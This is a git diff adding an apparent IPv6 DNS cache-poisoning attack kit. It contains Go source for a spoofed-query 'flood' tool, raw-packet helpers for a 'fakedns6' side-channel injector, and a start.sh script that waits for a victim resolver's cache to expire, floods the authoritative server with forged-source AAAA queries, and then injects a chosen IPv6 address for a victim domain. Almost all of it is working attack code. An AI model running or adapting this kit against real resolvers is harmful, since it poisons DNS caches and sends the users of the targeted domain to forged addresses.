defaultJitter*/ defaultJitter) * time.Millisecond) +} diff --git a/att script/4_v6_注入/code/src/fakedns6/go.mod b/att script/4_v6_注入/code/src/fakedns6/go.mod new file mode 100644 index 0000000..4baf665 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/go.mod @@ -0,0 +1,15 @@ +module fakedns6 + +go 1.20 + +require ( + github.com/google/gopacket v1.1.19 + github.com/miekg/dns v1.1.57 +) + +require ( + golang.org/x/mod v0.12.0 // indirect + golang.org/x/net v0.17.0 // indirect + golang.org/x/sys v0.13.0 // indirect + golang.org/x/tools v0.13.0 // indirect +) diff --git a/att script/4_v6_注入/code/src/fakedns6/go.sum b/att script/4_v6_注入/code/src/fakedns6/go.sum new file mode 100644 index 0000000..5ab4292 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/go.sum @@ -0,0 +1,25 @@ +github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8= +github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= +github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM= +github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc= +golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= +golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= +golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ= +golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= diff --git a/att script/4_v6_注入/code/src/fakedns6/ipv6util.go b/att script/4_v6_注入/code/src/fakedns6/ipv6util.go new file mode 100644 index 0000000..09245d3 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/ipv6util.go @@ -0,0 +1,103 @@ +package main + +import ( + "encoding/hex" + "fmt" + "net" + "os/exec" + "strings" + "syscall" + "unsafe" +) + +type router struct { + ifaces []net.Interface + addrs []net.IP + v6 routeSlice +} +type routeSlice []*rtInfo + +type rtInfo struct { + // Dst net.IPNet + Gateway, PrefSrc net.IP + OutputIface uint32 + Priority uint32 +} + +func getv6Gateway() (net.IP, error) { + rtr := &router{} + + tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6) + if err != nil { + return nil, err + } + + msgs, err := syscall.ParseNetlinkMessage(tab) + if err != nil { + return nil, err + } + + for _, m := range msgs { + switch m.Header.Type { + case syscall.NLMSG_DONE: + break + case syscall.RTM_NEWROUTE: + // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0])) + attrs, err := syscall.ParseNetlinkRouteAttr(&m) + if err != nil { + return nil, err + } + routeInfo := rtInfo{} + rtr.v6 = append(rtr.v6, &routeInfo) + for _, attr := range attrs { + switch attr.Attr.Type { + // case syscall.RTA_DST: + // routeInfo.Dst.IP = net.IP(attr.Value) + // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8) + case syscall.RTA_GATEWAY: + routeInfo.Gateway = net.IP(attr.Value) + case syscall.RTA_OIF: + routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0])) + case syscall.RTA_PRIORITY: + routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0])) + case syscall.RTA_PREFSRC: + routeInfo.PrefSrc = net.IP(attr.Value) + } + } + } + } + ips := []net.IP{} + for _, rt := range rtr.v6 { + if rt.Gateway != nil { + ips = append(ips, rt.Gateway) + } + } + return ips[0], nil +} + +func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) { + if debugOutput { + println("邻居发现--使用网卡接口为:" + ifacename) + } + out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output() + if err != nil { + println(err.Error()) + } else { + outlines := strings.Split(string(out), "/n") + for _, line := range outlines { + linelist := strings.Split(line, " ") + // 与网关对应的MAC地址 + if linelist[0] == gwIP.String() { + + maclist := strings.Split(linelist[2], ":") + var macbyte []byte + for _, m := range maclist { + b, _ := hex.DecodeString(m) + macbyte = append(macbyte, b[0]) + } + return net.HardwareAddr(macbyte), nil + } + } + } + return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址") +} diff --git a/att script/4_v6_注入/code/src/fakedns6/library.go b/att script/4_v6_注入/code/src/fakedns6/library.go new file mode 100644 index 0000000..edc4548 --- /dev/null +++ b/att script/4_v6_注入/code/src/fakedns6/library.go @@ -0,0 +1,171 @@ +package main + +import ( + "encoding/binary" + "errors" + "fmt" + "github.com/google/gopacket" + "github.com/google/gopacket/layers" + "github.com/google/gopacket/pcap" + "net" + "time" +) + +func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) { + addrs, err := iface.Addrs() + if err != nil { + return nil, errors.New("can not get ip address") + } + + var srcIP []net.IP + for _, address := range addrs { + if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() { + if ipnet.IP.To16() != nil { + //check repeat + okToAdd := true + for _, temp := range srcIP { + if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 { + okToAdd = false + break + } + } + if okToAdd { + srcIP = append(srcIP, ipnet.IP.To16()) + } + } + } + } + + if srcIP == nil || len(srcIP) == 0 { + return nil, errors.New("can not get ip address") + } + + return srcIP, nil +} + +func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error { + opts := gopacket.SerializeOptions{ + FixLengths: true, + ComputeChecksums: true, + } + buffer := gopacket.NewSerializeBuffer() + if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil { + return err + } + return handle.WritePacketData(buffer.Bytes()) +} + +func GetIfaceAddr(iface *net.Interface) (net.IP, error) { + addrs, err := iface.Addrs() + if err != nil { + return nil, errors.New("can not get ip address") + } + + var srcIP net.IP + for _, address := range addrs { + if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() { + if ipnet.IP.To16() != nil { + srcIP = ipnet.IP.To16() + break + } + } + } + + if srcIP == nil { + return nil, errors.New("can not get ip address") + } + + return srcIP, nil +} + +func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) { + srcIP, err := GetIfaceAddr(iface) + if err != nil { + return nil, errors.New("can not get ip address") + } + + start := time.Now() + // Prepare the layers to send for an ARP request. + eth := layers.Ethernet{ + SrcMAC: iface.HardwareAddr, + DstMAC: net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff}, + EthernetType: layers.EthernetTypeARP, + } + arp := layers.ARP{ + AddrType: layers.LinkTypeEthernet, + Protocol: layers.EthernetTypeIPv6, + HwAddressSize: 6, + ProtAddressSize: 4, + Operation: layers.ARPRequest, + SourceHwAddress: []byte(iface.HardwareAddr), + SourceProtAddress: []byte(srcIP), + DstHwAddress: []byte{0, 0, 0, 0, 0, 0}, + DstProtAddress: []byte(gatewayIP), + } + // Send a single ARP request packet (we never retry a send, since this + // is just an example ;) + if err := Send(handle, ð, &arp); err != nil { + return nil, err + } + // Wait 3 seconds for an ARP reply. + for { + if time.Since(start) > time.Second*3 { + return nil, errors.New("timeout getting ARP reply") + } + data, _, err := handle.ReadPacketData() + if err == pcap.NextErrorTimeoutExpired { + continue + } else if err != nil { + return nil, err + } + packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy) + if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil { + arp := arpLayer.(*layers.ARP) + if net.IP(arp.SourceProtAddress).Equal(gatewayIP) { + return arp.SourceHwAddress, nil + } + } + } +} + +func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int { + temp0 := binary.LittleEndian.Uint32(ip0.To16()) + temp1 := binary.LittleEndian.Uint32(ip1.To16()) + if temp0 == temp1 { + return 0 + } + if temp0 > temp1 { + return 1 + } + return -1 +} + +func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) { + + ipLayer := layers.IPv6{ + FlowLabel: flowlabel, + SrcIP: srcIP, + DstIP: dstIP, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + } + udpLayer := layers.UDP{ + SrcPort: srcPort, + DstPort: dstPort, + } + + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err) + } + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer) + if err != nil { + fmt.Println("xmitUDPv6 can not send packet", err) + } + + if timegap != 0 { + time.Sleep(time.Duration(timegap) * time.Microsecond) + } + +} diff --git a/att script/4_v6_注入/code/src/flood/go.mod b/att script/4_v6_注入/code/src/flood/go.mod new file mode 100644 index 0000000..b55b38b --- /dev/null +++ b/att script/4_v6_注入/code/src/flood/go.mod @@ -0,0 +1,20 @@ +module flood + +go 1.21 + +toolchain go1.21.4 + +require ( + github.com/google/gopacket v1.1.19 + github.com/jackpal/gateway v1.0.13 +) + +require ( + github.com/davecgh/go-spew v1.1.1 // indirect + github.com/pmezard/go-difflib v1.0.0 // indirect + github.com/stretchr/objx v0.5.0 // indirect + github.com/stretchr/testify v1.8.4 // indirect + golang.org/x/net v0.17.0 // indirect + golang.org/x/sys v0.13.0 // indirect + gopkg.in/yaml.v3 v3.0.1 // indirect +) diff --git a/att script/4_v6_注入/code/src/flood/go.sum b/att script/4_v6_注入/code/src/flood/go.sum new file mode 100644 index 0000000..1cca74c --- /dev/null +++ b/att script/4_v6_注入/code/src/flood/go.sum @@ -0,0 +1,38 @@ +github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= +github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= +github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8= +github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo= +github.com/jackpal/gateway v1.0.13 h1:fJccMvawxx0k7S1q7Fy/SXFE0R3hMXkMuw8y9SofWAk= +github.com/jackpal/gateway v1.0.13/go.mod h1:6c8LjW+FVESFmwxaXySkt7fU98Yv806ADS3OY6Cvh2U= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= +github.com/stretchr/objx v0.5.0 h1:1zr/of2m5FGMsad5YfcqgdqdWrIhu+EBEJRhR1U7z/c= +github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= +github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= +github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk= +github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM= +golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE= +golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= +golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28= +golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= +gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= +gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= diff --git a/att script/4_v6_注入/code/src/flood/ipv6util.go b/att script/4_v6_注入/code/src/flood/ipv6util.go new file mode 100644 index 0000000..09245d3 --- /dev/null +++ b/att script/4_v6_注入/code/src/flood/ipv6util.go @@ -0,0 +1,103 @@ +package main + +import ( + "encoding/hex" + "fmt" + "net" + "os/exec" + "strings" + "syscall" + "unsafe" +) + +type router struct { + ifaces []net.Interface + addrs []net.IP + v6 routeSlice +} +type routeSlice []*rtInfo + +type rtInfo struct { + // Dst net.IPNet + Gateway, PrefSrc net.IP + OutputIface uint32 + Priority uint32 +} + +func getv6Gateway() (net.IP, error) { + rtr := &router{} + + tab, err := syscall.NetlinkRIB(syscall.RTM_GETROUTE, syscall.AF_INET6) + if err != nil { + return nil, err + } + + msgs, err := syscall.ParseNetlinkMessage(tab) + if err != nil { + return nil, err + } + + for _, m := range msgs { + switch m.Header.Type { + case syscall.NLMSG_DONE: + break + case syscall.RTM_NEWROUTE: + // rtmsg := (*syscall.RtMsg)(unsafe.Pointer(&m.Data[0])) + attrs, err := syscall.ParseNetlinkRouteAttr(&m) + if err != nil { + return nil, err + } + routeInfo := rtInfo{} + rtr.v6 = append(rtr.v6, &routeInfo) + for _, attr := range attrs { + switch attr.Attr.Type { + // case syscall.RTA_DST: + // routeInfo.Dst.IP = net.IP(attr.Value) + // routeInfo.Dst.Mask = net.CIDRMask(int(rtmsg.Dst_len), len(attr.Value)*8) + case syscall.RTA_GATEWAY: + routeInfo.Gateway = net.IP(attr.Value) + case syscall.RTA_OIF: + routeInfo.OutputIface = *(*uint32)(unsafe.Pointer(&attr.Value[0])) + case syscall.RTA_PRIORITY: + routeInfo.Priority = *(*uint32)(unsafe.Pointer(&attr.Value[0])) + case syscall.RTA_PREFSRC: + routeInfo.PrefSrc = net.IP(attr.Value) + } + } + } + } + ips := []net.IP{} + for _, rt := range rtr.v6 { + if rt.Gateway != nil { + ips = append(ips, rt.Gateway) + } + } + return ips[0], nil +} + +func getGatewayV6Mac(ifacename string, gwIP net.IP) (net.HardwareAddr, error) { + if debugOutput { + println("邻居发现--使用网卡接口为:" + ifacename) + } + out, err := exec.Command("ip", "-6", "neighbor", "show", "dev", ifacename).Output() + if err != nil { + println(err.Error()) + } else { + outlines := strings.Split(string(out), "/n") + for _, line := range outlines { + linelist := strings.Split(line, " ") + // 与网关对应的MAC地址 + if linelist[0] == gwIP.String() { + + maclist := strings.Split(linelist[2], ":") + var macbyte []byte + for _, m := range maclist { + b, _ := hex.DecodeString(m) + macbyte = append(macbyte, b[0]) + } + return net.HardwareAddr(macbyte), nil + } + } + } + return nil, fmt.Errorf("无法找到网关" + gwIP.String() + "对应的MAC地址") +} diff --git a/att script/4_v6_注入/code/src/flood/main.go b/att script/4_v6_注入/code/src/flood/main.go new file mode 100644 index 0000000..be0f1b4 --- /dev/null +++ b/att script/4_v6_注入/code/src/flood/main.go @@ -0,0 +1,192 @@ +package main + +import ( + "errors" + "flag" + "fmt" + "math/rand" + "net" + "os" + "strconv" + + "github.com/google/gopacket" + "github.com/google/gopacket/layers" + "github.com/google/gopacket/pcap" +) + +// 各层的定义 +var ethernetLayer *layers.Ethernet +var debugOutput = false +var handle *pcap.Handle +var repeatTime = 100 + +func main() { + // 读取参数配置 + ifaceNameArg := flag.String("i", "vmnet1", "用于发送查询包的网络端口") + sourceaddrArg := flag.String("saddr", "", "伪造报文的源地址") + targetaddrArg := flag.String("taddr", "", "目标权威的地址") + qnameArg := flag.String("q", "www.baidu.com.", "请求查询的域名") + debugOutputArg := flag.Bool("d", false, "debug模式输出") + flag.Parse() + + // 指针->值 + ifaceName := *ifaceNameArg + sourceaddr := *sourceaddrArg + targetaddr := *targetaddrArg + qname := *qnameArg + debugOutput = *debugOutputArg + defer os.Exit(0) + + handle, _ = pcap.OpenLive( + ifaceName, + 65536, + true, + pcap.BlockForever, + ) + + // 构造MAC层 + var srcmac net.HardwareAddr + var dstmac net.HardwareAddr + if ifaceName == "" { + ifaceName = "eth0" + } + + // 源MAC + loiface, err := net.InterfaceByName(ifaceName) + if err != nil { + fmt.Println(err.Error()) + } + srcmac = loiface.HardwareAddr + if debugOutput { + fmt.Println("源MAC地址为: " + srcmac.String()) + } + + // 目的MAC + // 获取网关地址 + gwIP, _ := getv6Gateway() + fmt.Println("网关IPv6地址为:" + gwIP.String()) + dstmac, err = GetGatewayIPv6Addr(loiface, gwIP) + if err != nil { + fmt.Println(err.Error()) + } + if debugOutput { + fmt.Println("目的MAC地址为: " + dstmac.String()) + } + + // mac层包 + ethernetLayer = &layers.Ethernet{ + SrcMAC: srcmac, + DstMAC: dstmac, + EthernetType: layers.EthernetTypeIPv6, + } + + // dns查询 + for i := 0; i < repeatTime; i++ { + go sendDNSRequest(uint16(rand.Uint32()), qname, net.ParseIP(sourceaddr), net.ParseIP(targetaddr)) + } + if debugOutput { + fmt.Println("已连续发送" + strconv.Itoa(repeatTime) + "个请求包到" + targetaddr) + } +} + +func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error { + opts := gopacket.SerializeOptions{ + FixLengths: true, + ComputeChecksums: true, + } + buffer := gopacket.NewSerializeBuffer() + if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil { + return err + } + err := handle.WritePacketData(buffer.Bytes()) + if err != nil { + println(err.Error()) + } + return nil +} + +func GetIfaceAddr(iface *net.Interface) (net.IP, error) { + addrs, err := iface.Addrs() + if err != nil { + return nil, errors.New("can not get ip address") + } + + var srcIP net.IP + for _, address := range addrs { + if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() { + if ipnet.IP.To16() != nil { + srcIP = ipnet.IP.To16() + break + } + } + } + + if srcIP == nil { + return nil, errors.New("can not get ip address") + } + + return srcIP, nil +} + +func GetGatewayIPv6Addr(iface *net.Interface, gatewayIP net.IP) (net.HardwareAddr, error) { + gwMAC, err := getGatewayV6Mac(iface.Name, gatewayIP) + if err != nil { + fmt.Println(err.Error()) + panic("") + } + return gwMAC, nil +} + +func sendDNSRequest(id uint16, name string, resolverIP net.IP, authIP net.IP) { + if debugOutput { + fmt.Println("Send new DNS request", name, id, resolverIP.String(), authIP.String()) + } + _sendDNSRequest(id, name, resolverIP, authIP, (layers.UDPPort)(rand.Uint32()), 53) +} + +func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) { + ipLayer := layers.IPv6{ + FlowLabel: 1, + SrcIP: src, + DstIP: dst, + Version: 6, + HopLimit: 64, + NextHeader: layers.IPProtocolUDP, + //Flags: layers.IPv4DontFragment, + } + udpLayer := layers.UDP{ + SrcPort: sport, + DstPort: dport, + } + dnsLayer := layers.DNS{ + ID: id, + QR: false, + OpCode: 0, + AA: false, + TC: false, + RD: true, + RA: false, + Z: 0, + ResponseCode: 0, + QDCount: 1, + ANCount: 0, + NSCount: 0, + ARCount: 0, + Questions: []layers.DNSQuestion{{ + Name: []byte(name), + Type: layers.DNSTypeAAAA, + Class: layers.DNSClassIN, + }}, + Authorities: nil, + Additionals: nil, + } + + err := udpLayer.SetNetworkLayerForChecksum(&ipLayer) + if err != nil { + fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err) + } + err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer) + if err != nil { + fmt.Println("can not send packet @ sendDNSRequest: ", err) + } +} diff --git a/att script/4_v6_注入/code/start.sh b/att script/4_v6_注入/code/start.sh new file mode 100644 index 0000000..03b7812 --- /dev/null +++ b/att script/4_v6_注入/code/start.sh @@ -0,0 +1,38 @@ +# 目前仅考虑篡改或注入AAAA记录 +# $1 for victim resolver IP, $2 想要篡改的IPv6地址结果, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP +# Please run with sudo. + +# Verify the existing record domain, just for proof purposes. +echo '获取原记录中:' +dig @$1 $4 AAAA +sleeptime=0 +sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'` + +echo "等待缓存过期,$sleeptime 秒之后开始攻击..." +sleep $sleeptime + +echo "开始攻击" +echo "攻击参数:" +echo "目标域名权威服务地址:$5" +echo "目标解析服务地址:$1" +echo "目标域名:$4" + +# 伪造目标服务IPv6地址向权威服务器发送大量查询 [权威][目标IP][目标域名][网络接口] +bash ./dns_query.sh $5 $1 $4 $3 + +# 开始攻击 +# Change the argument accordingly +echo "执行侧信道攻击脚本中" +./fakedns6 -a=$5 -b=$1 -i=$3 -n=$4 -r=$1 -t 50000 -ad=$2 -tg 0 -s 10000 -e 65000 -j 0 -d=true + + + # Validations +echo "攻击结束" +dig @$1 $4 AAAA + +sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'` +echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.' + +echo '等待两秒...' +sleep 2 +dig @$1 $4 AAAA |